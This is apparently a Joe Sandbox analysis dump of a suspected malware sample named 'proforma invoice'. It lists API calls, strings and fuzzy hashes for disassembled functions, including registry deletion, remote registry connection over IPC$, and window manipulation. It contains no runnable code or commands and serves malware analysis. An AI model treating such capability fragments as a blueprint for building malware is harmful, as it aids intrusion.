                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6E9
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6FB
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD70D
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD71F
                    • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD731
                  • _free.LIBCMT ref: 00ADDA96
                    • Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
                    • Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0
                  • _free.LIBCMT ref: 00ADDAB8
                  • _free.LIBCMT ref: 00ADDACD
                  • _free.LIBCMT ref: 00ADDAD8
                  • _free.LIBCMT ref: 00ADDAFA
                  • _free.LIBCMT ref: 00ADDB0D
                  • _free.LIBCMT ref: 00ADDB1B
                  • _free.LIBCMT ref: 00ADDB26
                  • _free.LIBCMT ref: 00ADDB5E
                  • _free.LIBCMT ref: 00ADDB65
                  • _free.LIBCMT ref: 00ADDB82
                  • _free.LIBCMT ref: 00ADDB9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                  • String ID:
                  • API String ID: 161543041-0
                  • Opcode ID: 7d28868e338698166caf376ad6b48eaa2fa987d1074762d58f3180a8002ef85c
                  • Instruction ID: 4f7ea926a543a2a22f8b4991ce06f929a89b876ca3ef31f9d3908f1a7f405a2e
                  • Opcode Fuzzy Hash: 7d28868e338698166caf376ad6b48eaa2fa987d1074762d58f3180a8002ef85c
                  • Instruction Fuzzy Hash: 3A315A326046049FEB21AB38E945B6A7BE8FF50354F15841BE45ADB3A1DA30AC40DB20
                  APIs
                  • GetClassNameW.USER32(?,?,00000100), ref: 00B0369C
                  • _wcslen.LIBCMT ref: 00B036A7
                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B03797
                  • GetClassNameW.USER32(?,?,00000400), ref: 00B0380C
                  • GetDlgCtrlID.USER32(?), ref: 00B0385D
                  • GetWindowRect.USER32(?,?), ref: 00B03882
                  • GetParent.USER32(?), ref: 00B038A0
                  • ScreenToClient.USER32(00000000), ref: 00B038A7
                  • GetClassNameW.USER32(?,?,00000100), ref: 00B03921
                  • GetWindowTextW.USER32(?,?,00000400), ref: 00B0395D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                  • String ID: %s%u
                  • API String ID: 4010501982-679674701
                  • Opcode ID: bb13e75ea2ecd9de6f3aa2dd08180aecc06a38c2e661d21e8bb538420651b2de
                  • Instruction ID: d87411b69691b57a733e6b8f332d6a792b65c927e41bb804f83287298f2b101b
                  • Opcode Fuzzy Hash: bb13e75ea2ecd9de6f3aa2dd08180aecc06a38c2e661d21e8bb538420651b2de
                  • Instruction Fuzzy Hash: 4E91AC71204706AFD718DF64C889FAABBECFF44750F108669F99A92190DB30EA45CB91
                  APIs
                  • GetClassNameW.USER32(?,?,00000400), ref: 00B04994
                  • GetWindowTextW.USER32(?,?,00000400), ref: 00B049DA
                  • _wcslen.LIBCMT ref: 00B049EB
                  • CharUpperBuffW.USER32(?,00000000), ref: 00B049F7
                  • _wcsstr.LIBVCRUNTIME ref: 00B04A2C
                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00B04A64
                  • GetWindowTextW.USER32(?,?,00000400), ref: 00B04A9D
                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00B04AE6
                  • GetClassNameW.USER32(?,?,00000400), ref: 00B04B20
                  • GetWindowRect.USER32(?,?), ref: 00B04B8B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                  • String ID: ThumbnailClass
                  • API String ID: 1311036022-1241985126
                  • Opcode ID: 3cf442bf880fa8f2a27a266d47d91161cf3eb6176b01841d20cedd43aae2c0e4
                  • Instruction ID: 13bc76ba7465fb4f9f6cb2eed9a592567795b8f3cd96ee23bb977ab9810058b4
                  • Opcode Fuzzy Hash: 3cf442bf880fa8f2a27a266d47d91161cf3eb6176b01841d20cedd43aae2c0e4
                  • Instruction Fuzzy Hash: E7919AB21082059FDB14DF14C985BAA7BE8FF84314F0484A9FE859A1D6EB30ED45CBA1
                  APIs
                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00B2CC64
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00B2CC8D
                  • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B2CD48
                    • Part of subcall function 00B2CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00B2CCAA
                    • Part of subcall function 00B2CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00B2CCBD
                    • Part of subcall function 00B2CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B2CCCF
                    • Part of subcall function 00B2CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B2CD05
                    • Part of subcall function 00B2CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00B2CD28
                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B2CCF3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                  • String ID: RegDeleteKeyExW$advapi32.dll
                  • API String ID: 2734957052-4033151799
                  • Opcode ID: dbdb6772e94360bca0512b998d7fe2a87159f2a24b02cc5bc1937023009a40d5
                  • Instruction ID: 7838cb6903a5f924481f965fa6745113aac2bde0cab1f578c7bcdeff596d1f3a
                  • Opcode Fuzzy Hash: dbdb6772e94360bca0512b998d7fe2a87159f2a24b02cc5bc1937023009a40d5
                  • Instruction Fuzzy Hash: F5316075901129BBD7208BA5EC88EFFBFBCEF45750F1001A5A909E3150DB749E459BE0
                  APIs
                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B13D40
                  • _wcslen.LIBCMT ref: 00B13D6D
                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B13D9D
                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B13DBE
                  • RemoveDirectoryW.KERNEL32(?), ref: 00B13DCE
                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B13E55
                  • CloseHandle.KERNEL32(00000000), ref: 00B13E60
                  • CloseHandle.KERNEL32(00000000), ref: 00B13E6B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                  • String ID: :$\$\??\%s
                  • API String ID: 1149970189-3457252023
                  • Opcode ID: 2b97d266fe6d95150cec3dacb2ada46c742945d45a9bf67699e4f7fe94b0e251
                  • Instruction ID: 448a7ad0957a31ca58e857ff799f133353720dc30d789dc68e9d79f7aec84d91
                  • Opcode Fuzzy Hash: 2b97d266fe6d95150cec3dacb2ada46c742945d45a9bf67699e4f7fe94b0e251
                  • Instruction Fuzzy Hash: D8317272900219AADB219FA0DC89FEF37FCEF88B00F5041B5F505E61A0EB7497848B64
                  APIs
                  • timeGetTime.WINMM ref: 00B0E6B4
                    • Part of subcall function 00ABE551: timeGetTime.WINMM(?,?,00B0E6D4), ref: 00ABE555
                  • Sleep.KERNEL32(0000000A), ref: 00B0E6E1
                  • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00B0E705
                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B0E727
                  • SetActiveWindow.USER32 ref: 00B0E746
                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B0E754
                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00B0E773
                  • Sleep.KERNEL32(000000FA), ref: 00B0E77E
                  • IsWindow.USER32 ref: 00B0E78A
                  • EndDialog.USER32(00000000), ref: 00B0E79B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                  • String ID: BUTTON
                  • API String ID: 1194449130-3405671355
                  • Opcode ID: 24b03a8f9b61b2a2876aa5b0f947e0779a1aaac1eb35363b9d15875d4bce698c
                  • Instruction ID: 134fef3bd5e57064a0d82d657ebb500ffa495942e30be31bd69149f261ee88fe
                  • Opcode Fuzzy Hash: 24b03a8f9b61b2a2876aa5b0f947e0779a1aaac1eb35363b9d15875d4bce698c
                  • Instruction Fuzzy Hash: 63215471200205AFEB116F64EC8AA293FA9F755749F241865F52AA31F1DF71DC409B24
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B0EA5D
                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B0EA73
                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0EA84
                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B0EA96
                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B0EAA7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: SendString$_wcslen
                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                  • API String ID: 2420728520-1007645807
                  • Opcode ID: 7122108443f9f6c199f71323e5dbea2d301efdf5dfb55cc6216644563e9bae7c
                  • Instruction ID: 34f1d5f25e7704b4683ed99ae1c28e211296c9194f21ca2ebad29ca7d2c17a18
                  • Opcode Fuzzy Hash: 7122108443f9f6c199f71323e5dbea2d301efdf5dfb55cc6216644563e9bae7c
                  • Instruction Fuzzy Hash: A5115131A5021979D720A7A2DD4ADFF6BBCEBDAB40F0408A97811A70E1EFB04905C9B0
                  APIs
                  • GetDlgItem.USER32(?,00000001), ref: 00B05CE2
                  • GetWindowRect.USER32(00000000,?), ref: 00B05CFB
                  • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00B05D59
                  • GetDlgItem.USER32(?,00000002), ref: 00B05D69
                  • GetWindowRect.USER32(00000000,?), ref: 00B05D7B
                  • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00B05DCF
                  • GetDlgItem.USER32(?,000003E9), ref: 00B05DDD
                  • GetWindowRect.USER32(00000000,?), ref: 00B05DEF
                  • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00B05E31
                  • GetDlgItem.USER32(?,000003EA), ref: 00B05E44
                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B05E5A
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00B05E67
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$ItemMoveRect$Invalidate
                  • String ID:
                  • API String ID: 3096461208-0
                  • Opcode ID: f56bda51698071005f64a4fa68896e40125b23875b01baa4f502be37e89438cd
                  • Instruction ID: 92039f89740c11e052a3b3ce1699a35e1c87b415176f78b33361cae9e3203138
                  • Opcode Fuzzy Hash: f56bda51698071005f64a4fa68896e40125b23875b01baa4f502be37e89438cd
                  • Instruction Fuzzy Hash: 3151F0B1A00615AFDB18CFA8DD89AAE7BF5FB48300F248269F915E7690DB709D04CF50
                  APIs
                    • Part of subcall function 00AB8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AB8BE8,?,00000000,?,?,?,?,00AB8BBA,00000000,?), ref: 00AB8FC5
                  • DestroyWindow.USER32(?), ref: 00AB8C81
                  • KillTimer.USER32(00000000,?,?,?,?,00AB8BBA,00000000,?), ref: 00AB8D1B
                  • DestroyAcceleratorTable.USER32(00000000), ref: 00AF6973
                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00AB8BBA,00000000,?), ref: 00AF69A1
                  • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00AB8BBA,00000000,?), ref: 00AF69B8
                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00AB8BBA,00000000), ref: 00AF69D4
                  • DeleteObject.GDI32(00000000), ref: 00AF69E6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                  • String ID:
                  • API String ID: 641708696-0
                  • Opcode ID: 7fa776ae05e6f1e4e1ebf9f32d40ea767aeab8020c459e3e5de953c065c3f5eb
                  • Instruction ID: 9e5184c6bca5d058a503c63ec44e305c1e782e2a9f043552aa26e96b7fb6f30e
                  • Opcode Fuzzy Hash: 7fa776ae05e6f1e4e1ebf9f32d40ea767aeab8020c459e3e5de953c065c3f5eb
                  • Instruction Fuzzy Hash: F361BB71102604DFCB259F6CCA48BB97BF9FB41312F244919E2469B561CB79AC82DFA0
                  APIs
                    • Part of subcall function 00AB9944: GetWindowLongW.USER32(?,000000EB), ref: 00AB9952
                  • GetSysColor.USER32(0000000F), ref: 00AB9862
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ColorLongWindow
                  • String ID:
                  • API String ID: 259745315-0
                  • Opcode ID: 2156e6dab95dc5c70ba9e2fd449c6e6fa6efb6cdca77c593f57a307b2a55655c
                  • Instruction ID: 0c017c3c925450e6086449b5906cfdd438faef52fff9802296cd533127536131
                  • Opcode Fuzzy Hash: 2156e6dab95dc5c70ba9e2fd449c6e6fa6efb6cdca77c593f57a307b2a55655c
                  • Instruction Fuzzy Hash: 05418131104644AFDB215FB89C85BFE3BB9AB06331F244659FAA6971E2DB319C42DB10
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00AEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00B09717
                  • LoadStringW.USER32(00000000,?,00AEF7F8,00000001), ref: 00B09720
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                  • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00AEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00B09742
                  • LoadStringW.USER32(00000000,?,00AEF7F8,00000001), ref: 00B09745
                  • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00B09866
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: HandleLoadModuleString$Message_wcslen
                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                  • API String ID: 747408836-2268648507
                  • Opcode ID: da0383bcc48d3938261fcc2e54a8753ab2eb9fe051fa81db129be2194e554d94
                  • Instruction ID: 4139ed5cd460d3262e3aaf604147a6809ac7ab0b75eb8ad9298be75ca1cb2bf9
                  • Opcode Fuzzy Hash: da0383bcc48d3938261fcc2e54a8753ab2eb9fe051fa81db129be2194e554d94
                  • Instruction Fuzzy Hash: C6410872800219AACF05EBE0CE86EEEB7B8AF56340F604065F505771D2EF256F48CB61
                  APIs
                    • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B007A2
                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B007BE
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B007DA
                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B00804
                  • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00B0082C
                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B00837
                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B0083C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                  • API String ID: 323675364-22481851
                  • Opcode ID: fc07668b800dea1318cfd2a8df17bd4426455825623cbaf869be8dcbc283386a
                  • Instruction ID: 0d329d0fdb0e625a4cbc2ea10da6bbc89da128973738a71fad3dbbd6cbe19062
                  • Opcode Fuzzy Hash: fc07668b800dea1318cfd2a8df17bd4426455825623cbaf869be8dcbc283386a
                  • Instruction Fuzzy Hash: 9A41F872C10229ABDF15EFA4DD859EEBBB8FF14350F544169E901B71A1EB345E04CBA0
                  APIs
                  • VariantInit.OLEAUT32(?), ref: 00B23C5C
                  • CoInitialize.OLE32(00000000), ref: 00B23C8A
                  • CoUninitialize.OLE32 ref: 00B23C94
                  • _wcslen.LIBCMT ref: 00B23D2D
                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00B23DB1
                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00B23ED5
                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00B23F0E
                  • CoGetObject.OLE32(?,00000000,00B3FB98,?), ref: 00B23F2D
                  • SetErrorMode.KERNEL32(00000000), ref: 00B23F40
                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B23FC4
                  • VariantClear.OLEAUT32(?), ref: 00B23FD8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                  • String ID:
                  • API String ID: 429561992-0
                  • Opcode ID: 79115baba27a021271bb2c53e8ed6a4f73855f70e2fe01951ed07e8cbd0d59d3
                  • Instruction ID: 4241825de17bf51b2cdedf9fb8b71c111bfbcba3ed644f305fbca5924e040448
                  • Opcode Fuzzy Hash: 79115baba27a021271bb2c53e8ed6a4f73855f70e2fe01951ed07e8cbd0d59d3
                  • Instruction Fuzzy Hash: 65C168716083159FC700DF68D98492BBBE9FF89B44F1049ADF98A9B250DB34EE05CB52
                  APIs
                  • CoInitialize.OLE32(00000000), ref: 00B17AF3
                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B17B8F
                  • SHGetDesktopFolder.SHELL32(?), ref: 00B17BA3
                  • CoCreateInstance.OLE32(00B3FD08,00000000,00000001,00B66E6C,?), ref: 00B17BEF
                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B17C74
                  • CoTaskMemFree.OLE32(?,?), ref: 00B17CCC
                  • SHBrowseForFolderW.SHELL32(?), ref: 00B17D57
                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B17D7A
                  • CoTaskMemFree.OLE32(00000000), ref: 00B17D81
                  • CoTaskMemFree.OLE32(00000000), ref: 00B17DD6
                  • CoUninitialize.OLE32 ref: 00B17DDC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
